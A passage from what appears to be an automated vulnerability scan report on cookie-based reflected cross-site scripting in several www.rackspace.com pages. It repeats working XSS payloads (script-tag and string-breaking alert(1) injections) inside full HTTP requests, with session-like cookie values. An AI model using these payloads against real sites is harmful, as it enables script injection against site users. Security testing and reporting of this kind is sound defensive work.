chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9267b"%3balert(1)//5ecfe7cac99 was submitted in the IS_UASrackuid cookie. This input was echoed as 9267b";alert(1)//5ecfe7cac99 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f89267b"%3balert(1)//5ecfe7cac99; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3407"><script>alert(1)</script>7f3b67cd2a0 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dd3407"><script>alert(1)</script>7f3b67cd2a0; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcd85"%3balert(1)//23c8788f011 was submitted in the chatslider cookie. This input was echoed as fcd85";alert(1)//23c8788f011 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dfcd85"%3balert(1)//23c8788f011; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 602dd"><script>alert(1)</script>e6477830f9e was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/legal/clouddriveterms.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8602dd"><script>alert(1)</script>e6477830f9e; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d23d6"%3balert(1)//5eb6c2fbb00 was submitted in the IS_UASrackuid cookie. This input was echoed as d23d6";alert(1)//5eb6c2fbb00 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/legal/clouddriveterms.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8d23d6"%3balert(1)//5eb6c2fbb00; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4069d"><script>alert(1)</script>a0d2db8aee1 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/legal/clouddriveterms.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D4069d"><script>alert(1)</script>a0d2db8aee1; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ffa08"%3balert(1)//5b385cc3b8d was submitted in the chatslider cookie. This input was echoed as ffa08";alert(1)//5b385cc3b8d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/legal/clouddriveterms.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dffa08"%3balert(1)//5b385cc3b8d; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 643ff"><script>alert(1)</script>f7eed7ab8b4 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/legal/generalterms.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8643ff"><script>alert(1)</script>f7eed7ab8b4; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7352f"%3balert(1)//3b93e013233 was submitted in the IS_UASrackuid cookie. This input was echoed as 7352f";alert(1)//3b93e013233 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/legal/generalterms.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f87352f"%3balert(1)//3b93e013233; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f506c"><script>alert(1)</script>2fc96242434 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/legal/generalterms.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Df506c"><script>alert(1)</script>2fc96242434; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc6e1"%3balert(1)//24bc06608e was submitted in the chatslider cookie. This input was echoed as dc6e1";alert(1)//24bc06608e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/legal/generalterms.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Ddc6e1"%3balert(1)//24bc06608e; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0abc"><script>alert(1)</script>f67bbec0e3b was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/legal/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8f0abc"><script>alert(1)</script>f67bbec0e3b; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9d19"%3balert(1)//4fb3db8a28a was submitted in the IS_UASrackuid cookie. This input was echoed as d9d19";alert(1)//4fb3db8a28a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/legal/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8d9d19"%3balert(1)//4fb3db8a28a; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 279c9"><script>alert(1)</script>3be2fd9b4de was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
